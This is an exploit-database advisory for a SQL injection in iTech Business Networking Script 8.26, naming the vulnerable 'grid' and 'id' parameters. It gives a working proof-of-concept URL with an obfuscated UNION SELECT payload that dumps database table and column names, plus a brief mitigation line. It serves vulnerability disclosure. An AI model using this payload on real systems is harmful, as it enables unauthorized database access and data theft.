vendor:
Business Networking Script
by:
Ihsan Sencan
N/A
CVSS
N/A
SQL Injection
89
CWE
Product Name: Business Networking Script
Affected Version From: 8.26
Affected Version To: 8.26
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2017
iTech Business Networking Script 8.26 – SQL Injection
The vulnerability allows an attacker to inject sql commands into the vulnerable parameter 'grid' in group.php and 'id' in join_group.php. Proof of Concept: http://localhost/[PATH]/group.php?grid=[SQL] -1'+/*!22222union*/+/*!22222select*/+0x31,0x32,0x33,0x34,0x35,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134--+- and http://localhost/[PATH]/join_group.php?id=[SQL].
Mitigation:
Input validation and sanitization should be done to prevent SQL injection attacks.
